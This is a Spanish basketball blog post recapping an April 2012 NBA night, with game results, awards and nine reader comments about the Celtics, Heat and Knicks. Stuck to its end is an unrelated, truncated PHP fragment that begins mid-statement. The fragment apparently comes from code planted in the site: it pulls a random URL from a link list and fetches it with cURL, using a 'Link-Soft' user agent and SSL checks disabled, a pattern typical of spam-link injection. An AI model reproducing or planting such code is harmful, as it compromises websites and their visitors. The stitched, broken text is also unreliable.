La Crónica: Equipos medicina

11 de April de 2012 por TheDeerHunter

Comentábamos ayer las recientes “pájaras” de Sixers y Mavericks. En el momento de la competición que nos encontramos no hay nada mejor que enfrentarse con rivales que no tienen entre sus objetivos prioritarios el ganar partidos. Sobra decir que este es un aspecto que no nos gusta nada.

Los Sixers impusieron su profundidad ante unos Nets de brazos caídos (107-88). Sólo Humphries dió señales de vida y gracias, porque fueron suyos la cuarta parte de los rebotes y de los puntos totales de su equipo. Con 17 rebotes de déficit no queremos ni imaginarnos qué es lo que hubiera pasado sin su concurso. Los Mavs también aprovecharon su gran rendimiento colectivo para doblegar unos Kings que, al completo, sí pudieron plantar cara (100-110). Inmenso Cousins pero insuficiente ante la aportación útil de hasta 10 rivales. No se puede decir lo mismo de Orlando, que sin Howard siguen en caída libre. Ayer caían ante los Wizards y Seraphin les hizo trizas (85-93).

En los dos choques de más alto nivel de la jornada pudimos disfrutar de un precioso duelo entre Pierce y LeBron. Estadísticamente lo ganó el segundo, pero el gato al agua se lo llevaron los verdes (115-107). Se acercan los playoffs y los Celtics vuelven a ser temibles. Ley de vida.

Finalmente (e ignorando a propósito el intrascendentísimo Bobcats@Cavaliers) hubo vendetta de los Bulls ante New York (86-98). Grande RIP Hamilton, muy bien arropado por Deng y Korver. El Melo-sistema no termina de arrancar.

PREMIOS

MVP: Hoy tenemos que destacar a los Boston Celtics que superaron a los Heat con toda una exhibición ofensiva. Garnett, 24-9; Pierce, 27-7, y Rondo, 18-4-15. Trío de ases verdes.

Rookie: Kemba Walker fue el mejor con 20 puntos pero con nula aportación en el resto de facetas. Su compañero Bismack Biyombo consiguió 12 puntos, 8 rebotes y 3 tapones e Isaiah Thomas, 16 puntos, 4 rebotes y 5 asistencias.

Sorpresa: Kevin Seraphin y Lester Hudson, jugadores desconocidos para el gran público fueron los mejores de la jornada. El de los Wizards, el único interior sano del equipo, consiguió 24 puntos y 13 asistencias y el de los Cavs, que se aprovecha de la baja de Kyrie Irving, consiguió 26 puntos, 6 asistencias y 8 rebotes.

Decepción: Exceptuando a JR Smith el resto del banquillo de los Knicks estuvo especialmente sembrado. 0-2 de Jeffries, 0-4 de Novak, 0-3 de Douglas… En total, 4 puntitos.

Esfuerzo en vano: 36 puntos, 7 rebotes y 7 asistencia para Lebron James. Una gran actuación si exceptuamos los minutos finales en los que no rindió al nivel esperado. Demarcus Cousins se fue a los 25 puntos, 18 rebotes y 6 robos en la derrota de los Kings frente los Mavs.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Vader dice:
    #1

    El Melo-sistema esta ganando muchisimos partidos pero si el banquillo aporta tan poco + las lesiones de Stat y Lin pues normal que algún partido se pierda y más contra los Bulls.

    He visto ya algunos partidos de los Knicks con Woodson y para mi se merece una oportunidad el año que viene. El equipo defiende con uñas y dientes, aprovecha la plantilla y no tiene manías raras ni ataques de entrenador como muchos en la NBA.

    Saludos

      Citar

  2. Sancho88 dice:
    #2

    Vader:
    El Melo-sistema esta ganando muchisimos partidos pero si el banquillo aporta tan poco + las lesiones de Stat y Lin pues normal que algún partido se pierda y más contra los Bulls.

    He visto ya algunos partidos de los Knicks con Woodson y para mi se merece una oportunidad el año que viene. El equipo defiende con uñas y dientes, aprovecha la plantilla y no tiene manías raras ni ataques de entrenador como muchos en la NBA.

    Saludos

    Totalmente de acuerdo Vader. El problema de los Knicks es que se quieren demasiado a sí mismos. Lo mismo te hacen un cuarto prodigioso, que piensas que son candidatos al título si juegan así, como al siguiente cuarto se desmoronan en defensa, no dan un pase bueno, etc. Son muy irregulares, pero al contrario que en otras ocasiones, este sí parece ser el buen camino. Con Lin y Stat la cosa cambiaría, siguen siendo carne de primera ronda, pero si refuerzan un poco la pintura para la próxima temporada, seguro que van a dar guerra y a acomodarse definitivamente entre la élite de la Conferencia Este

      Citar

  3. melo15 dice:
    #3

    Lastima del inicio del mal (me quedo corto) inicio, pero aun no ha acabado, tenemos a los Magic a 3 derrotas, y aun podemos cogerlos.

      Citar

  4. Esteban dice:
    #4

    temibles, esa es la palabra que describe a los celtics, si solo tuvieran otro pivot…

    en PO, no hay nada como enfrentarse a armado rapido de tiro de allen y me pregunto, ¿hay algo mas util que eso en PO? si, un tirador del ultimo segundo, y alli entra Pierce

    es cierto les faltan piernas energia y profundidad para vencen a bulls o celtics, pero tienen todo lo otro, si alguien puede dar el batacazo van a ser ellos

    espero que angie salte con un az bajo la manga, y encuentre algun fichaje de algun tipo libre por que los celtics lo necesita, me pregunto, como estara resheed? andaba con ganas de volver a la nba y con poquito podria ayudar a estos celtics

      Citar

  5. Heineken dice:
    #5

    Llega la hora de la verdad y es cuando los adultos (Allen, Garnett, Pierce, Duncan, Parker, Nowitzki…) dan lecciones a los niños y no tan niños (Melo, LeBron, Durant…)

      Citar

  6. rumbero dice:
    #6

    El último cuarto de Garnett es para mirárselo bien. Se puede decir que él solito finiquita el partido. Será un bocazas pero es todo un lujo que aun nos deje actuaciones así. Y el 18-15 de Rondo no sorprendre cuando hay un contender delante. Que jugón….Si aguantan todos sanos, en el Este más de uno va a empezar a temblar

      Citar

  7. GreenPride dice:
    #7

    Fenomenal partido de los Celtics, de todo el equipo. La verdad es que da gusto verles jugar ahora, qué intensidad y en qué gran forma están Pierce y Garnett. Se acercan los playoffs y los Celtics han ganado a los Heat seguido en una semana en casa y fuera. ¿Pueden ser el equipo revelación de cara a playoffs? Si les dura el nivel de juego creo que nadie les querrá ver en los PO. Por los Heat muy bien LeBron pero los demás regular, no hicieron mal partido pero los Celtics estuvieron mejor. Siguen siendo los favoritos para mí pero tendrán que sudar mucho para ganar el anillo. Apasionantes playoffs los que se vislumbran

      Citar

  8. simon dice:
    #8

    pues yo no veo a Boston mas alla de semis de conferencia… y gracias…

      Citar

  9. Esteban dice:
    #9

    simon:
    pues yo no veo a Boston mas alla de semis de conferencia… y gracias…

    creo que seria lo mas logico, y hasta hace poco mas de un mes apenas se veian en segunda ronda

    hablamos que son el unico que pueden dar el gran batacazo en el este, ya que parece que orlando no compite mas o no se q les pasa

    obviamente q si la final del este no es heat-bulls seria una bomba, pero ojala que explote

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>